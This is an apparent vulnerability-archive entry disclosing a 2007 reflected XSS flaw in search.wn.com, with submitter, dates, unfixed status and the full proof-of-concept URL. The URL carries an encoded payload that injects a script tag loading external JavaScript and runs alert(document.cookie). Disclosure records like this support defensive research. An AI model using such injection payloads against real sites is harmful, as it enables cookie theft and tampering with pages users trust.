Security researcher KaBuS, has submitted on 14/06/2007 a cross-site-scripting (XSS) vulnerability affecting search.wn.com, which at the time of submission ranked 10081 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/06/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 14/06/2007 |
Date published: 15/06/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: KaBuS |
Domain: search.wn.com |
Category: XSS |
Pagerank: 10081 |
URL: http://search.wn.com/?action=search&search_string=%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22 http%3A%2F%2Fhardy.wn.com%2Fula%2Fcheetah%2Fjs%2FverMenu_switch.js%22%3EHACKED%3C%2Fscript%3E%3Cscri pt%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&language_id=1&sort_type=nwf&corpus=current&search_ type=head_all |
Click here to view the mirror
|
|
|